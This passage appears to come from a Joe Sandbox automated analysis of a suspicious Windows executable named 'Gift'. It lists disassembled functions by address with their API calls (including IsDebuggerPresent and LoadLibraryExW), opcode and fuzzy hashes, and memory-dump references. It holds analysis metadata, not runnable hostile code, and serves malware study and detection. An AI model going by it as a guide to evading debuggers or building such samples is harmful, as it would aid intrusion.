                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 86f15f1ec7ad2432eb1b083b6ecdb1504f342084df1981d63f7cf83d46ca8af1
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: CE31D570A1010EDBD718DF18C4C0979F7A6FF49380B648AA5E609CB652EB71EDE1CB80
                                                                          Function 002E5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 002E5FEF
                                                                            • Part of subcall function 002F359C: __lock.LIBCMT ref: 002F35A2
                                                                            • Part of subcall function 002F359C: DecodePointer.KERNEL32(00000001,?,002E6004,00328892), ref: 002F35AE
                                                                            • Part of subcall function 002F359C: EncodePointer.KERNEL32(?,?,002E6004,00328892), ref: 002F35B9
                                                                            • Part of subcall function 002E5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002E5F18
                                                                            • Part of subcall function 002E5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E5F2D
                                                                            • Part of subcall function 002E5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002E526C
                                                                            • Part of subcall function 002E5240: IsDebuggerPresent.KERNEL32 ref: 002E527E
                                                                            • Part of subcall function 002E5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002E52E6
                                                                            • Part of subcall function 002E5240: SetCurrentDirectoryW.KERNEL32(?), ref: 002E5366
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E602F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          • Opcode ID: 8c4b767bbc223c93a99db48fe7b6966889273d58aab46d008a03dd4abd52ca4c
                                                                          • Instruction ID: 83cda31918409bf01d0659360a5008dfcf8b70196ac117f924d1fed80f84b8e8
                                                                          • Opcode Fuzzy Hash: 8c4b767bbc223c93a99db48fe7b6966889273d58aab46d008a03dd4abd52ca4c
                                                                          • Instruction Fuzzy Hash: D4118E718283119BC712EF69EC0594ABBFCFF99750F40491BF484872A1DBB19954CF92
                                                                          Function 002F581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          • Opcode ID: f3fe967086261dd549e53f285b477a63c195f71ee8c8b9a9590adae648132723
                                                                          • Instruction ID: a49e9f642b041fda5f8a0b703beda88f0d4b02bc5f9b1b784fa7a06e077bd875
                                                                          • Opcode Fuzzy Hash: f3fe967086261dd549e53f285b477a63c195f71ee8c8b9a9590adae648132723
                                                                          • Instruction Fuzzy Hash: DD017571820A1DEBCF11AF65CC019AEFBA1AF403E0F144135BB245B161D7318A71DF51
                                                                          Function 002F55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • __lock_file.LIBCMT ref: 002F560B
                                                                            • Part of subcall function 002F6E3E: __lock.LIBCMT ref: 002F6E61
                                                                          • __fclose_nolock.LIBCMT ref: 002F5616
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: 07736779575b7404ed7d97d6206539485092a1378c0ecb6153f65bed5cccb51b
                                                                          • Instruction ID: 97d98c3f031f03b6d6215b6d5c0d4150055d07523e44a70b99982949afb695c5
                                                                          • Opcode Fuzzy Hash: 07736779575b7404ed7d97d6206539485092a1378c0ecb6153f65bed5cccb51b
                                                                          • Instruction Fuzzy Hash: 79F0F072831B2D9AD7106F758802B7EE7E1AF403F4F508229E728AB1C1CBBC49218F51
                                                                          Function 002F5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 002F5EB4
                                                                          • __ftell_nolock.LIBCMT ref: 002F5EBF
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 35bdafa5490777c80b506beb0518b606929d42fb6de6fc39404871a1cf41366f
                                                                          • Instruction ID: e1134f0c722efb5610eb1af6c57efec6584e28427bd17e54f4083034b1c66fb1
                                                                          • Opcode Fuzzy Hash: 35bdafa5490777c80b506beb0518b606929d42fb6de6fc39404871a1cf41366f
                                                                          • Instruction Fuzzy Hash: 40F0A732931A2D9ADB00BB74880377EF6A06F113B5F114225E224EB1C1CFB84A229F51
                                                                          Function 002E5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5AEF
                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 002E5B1F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell__memset
                                                                          • String ID:
                                                                          • API String ID: 928536360-0
                                                                          • Opcode ID: 369625dfc68c41c28887fff0364339810afc98021ffc4b88b0e97cd17e7b82a0
                                                                          • Instruction ID: 7899344e9b9b0a4a23955837f40e66a3b74334ef4db8f46c87af8aba01a5e896
                                                                          • Opcode Fuzzy Hash: 369625dfc68c41c28887fff0364339810afc98021ffc4b88b0e97cd17e7b82a0
                                                                          • Instruction Fuzzy Hash: 55F082708283189BE7A39B249C467E677BC970030CF0005EAAA4896296DB720B98CF55
                                                                          Function 0034C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$__swprintf
                                                                          • String ID:
                                                                          • API String ID: 207118244-0
                                                                          • Opcode ID: 0d107e4b607b5f072564c7f1c4c936ed5805ae4bc352184c50d00f2a7dc98201
                                                                          • Instruction ID: 20363d6d9fc1a993d399b3fc58f7dfa1e944d477bf4e7b2bf7ff2dcc19c10666
                                                                          • Opcode Fuzzy Hash: 0d107e4b607b5f072564c7f1c4c936ed5805ae4bc352184c50d00f2a7dc98201
                                                                          • Instruction Fuzzy Hash: C5B16A34A1110AEFCB15EFA4C891DEEB7B5FF48310F15901AF915AB291EB30A952CF90
                                                                          Function 002DA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fdba8c9f7d907157de91e1d6aa9b9b599825c043f3ba9d446b60e6c245ab014
                                                                          • Instruction ID: ecdcb318a188e13267fb8c482b24efe7ea1f6d5d0827406a68c83f619da85eaf
                                                                          • Opcode Fuzzy Hash: 8fdba8c9f7d907157de91e1d6aa9b9b599825c043f3ba9d446b60e6c245ab014
                                                                          • Instruction Fuzzy Hash: 9B61CB70610606DFCB14DF64C891EBAB7E9EF08310F15856EE9168B391D7B4EDA0CB52
                                                                          Function 002E343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 7ef1eefb64bbea71f21a4bed7fe8ced150f46f3a70fbe4061ebaf80c1ff72c63
                                                                          • Instruction ID: 2959bb8b0575a56112a407b4eac687cb8aec2bf81f1d6fb720bddf74aaaa4d19
                                                                          • Opcode Fuzzy Hash: 7ef1eefb64bbea71f21a4bed7fe8ced150f46f3a70fbe4061ebaf80c1ff72c63
                                                                          • Instruction Fuzzy Hash: 3A31C079264643DFC724DF1AD484A21F7E0FF08351B94C569E98A8B795DB70E8A1CB80
                                                                          Function 0030E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 39a1c94fbd322ea37826a03cb0eafe234b45eaedaaa43e739984eeb802a81d68
                                                                          • Instruction ID: 146d86d5325c8f8dab69162ed58353d86936b2bcdcdb1598f85cd9917d38742d
                                                                          • Opcode Fuzzy Hash: 39a1c94fbd322ea37826a03cb0eafe234b45eaedaaa43e739984eeb802a81d68
                                                                          • Instruction Fuzzy Hash: 94411574618351DFDB25CF14C498B1ABBE1BF45308F0988ADE8899B362C771EC95CB52
                                                                          Function 002E49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E4B29: FreeLibrary.KERNEL32(00000000,?), ref: 002E4B63
                                                                            • Part of subcall function 002F547B: __wfsopen.LIBCMT ref: 002F5486
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002E27AF,?,00000001), ref: 002E49F4
                                                                            • Part of subcall function 002E4ADE: FreeLibrary.KERNEL32(00000000), ref: 002E4B18
                                                                            • Part of subcall function 002E48B0: _memmove.LIBCMT ref: 002E48FA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                          • String ID:
                                                                          • API String ID: 1396898556-0
                                                                          • Opcode ID: a67123a0990f1f45fd5b4e49d2a181b817a9be837e4f710892d984fefdd99dec
                                                                          • Instruction ID: d8d71bcefc2d6ad2e4634cc1ced552bd81025a1a5e91cc79b457e9fbc80de225
                                                                          • Opcode Fuzzy Hash: a67123a0990f1f45fd5b4e49d2a181b817a9be837e4f710892d984fefdd99dec
                                                                          • Instruction Fuzzy Hash: 47112B316E0205ABCB15FF71CC26FAE73A99F40711F50843DF945A6281EF708A20AF54
                                                                          Function 002E1BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 913aa5ad15723e0e23089c2103ac2053663674067e590e7437a5a4b8f98ff748
                                                                          • Instruction ID: 5da2f850dd7b546c98c7b957fb88e26e24a7b96a5e4cfe5829f6388520be0378
                                                                          • Opcode Fuzzy Hash: 913aa5ad15723e0e23089c2103ac2053663674067e590e7437a5a4b8f98ff748
                                                                          • Instruction Fuzzy Hash: CA116A76254605DFC724CF29D481926F7E9FF48354760883EE88ACB261EB32E861CF40
                                                                          Function 0030E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 81150db8cc8cdbada3a0d659bac9d4ad1dbd0f261464f01a3f5d4139dcf7b451
                                                                          • Instruction ID: 2592cfa4b398f5c5ac9283710f2b36ffe433f7143dca228c411dd3d8c7688d79
                                                                          • Opcode Fuzzy Hash: 81150db8cc8cdbada3a0d659bac9d4ad1dbd0f261464f01a3f5d4139dcf7b451
                                                                          • Instruction Fuzzy Hash: F2212EB4628352DFCB25CF14C458B1ABBE4BF84304F05896DE88A57362C731EC69CB92
                                                                          Function 002E1A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 38c2a17dcf10df27e90b63f8c3c2b279d922f29058a572b75a1f29e5e0f7ec9f
                                                                          • Instruction ID: 732229fce516c9cd0d8699ce5e27608be56eb9fd8684371c10813bad10a73e32
                                                                          • Opcode Fuzzy Hash: 38c2a17dcf10df27e90b63f8c3c2b279d922f29058a572b75a1f29e5e0f7ec9f
                                                                          • Instruction Fuzzy Hash: 0801F7722617056EC7205F39D802A77B7949B447D0F508539F61ACA2D1DA71E4608B50
                                                                          Function 0034495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00344998
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentVariable
                                                                          • String ID:
                                                                          • API String ID: 1431749950-0
                                                                          • Opcode ID: 3ed187d344ea3c1a663fe9522e28f6228f5bdc4d7834a49323dc3fed74c84252
                                                                          • Instruction ID: 68c69a40dac75630d88d11f12932360fe26b06dc077c0a1b0caa19e07dd43f9c
                                                                          • Opcode Fuzzy Hash: 3ed187d344ea3c1a663fe9522e28f6228f5bdc4d7834a49323dc3fed74c84252
                                                                          • Instruction Fuzzy Hash: C0F01D36618148AFCB15FB65D84ACAF77BCEF45360B40405AF9089B351DE70AD518B50
                                                                          Function 00337C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • _memset.LIBCMT ref: 00337CB4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 525207782-0
                                                                          • Opcode ID: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                                          • Instruction ID: 76998dc675ae0d913000eb34a93384706fc42544d06fe9b25448cfab06768763
                                                                          • Opcode Fuzzy Hash: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                                          • Instruction Fuzzy Hash: 9301F6742042049FD325EF5CD581F15BBE5AF59350F24846AF6888B392DB72E810CF90
                                                                          Function 0030DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • _memmove.LIBCMT ref: 0030DC8B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1602317333-0
                                                                          • Opcode ID: ae9eabddbf4a68bfc84dab50d204ff83bc6aaafdc3dc9210237590f058b6849d
                                                                          • Instruction ID: 0124261f7df78fbe28345c93267ac22491895ac7e234afc6aeeaf8181f262120
                                                                          • Opcode Fuzzy Hash: ae9eabddbf4a68bfc84dab50d204ff83bc6aaafdc3dc9210237590f058b6849d
                                                                          • Instruction Fuzzy Hash: A3F01274614105DFD711DF68C581E25BBE1BF1A340B24846DE6898B392EB73D821CF91
                                                                          Function 002E4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
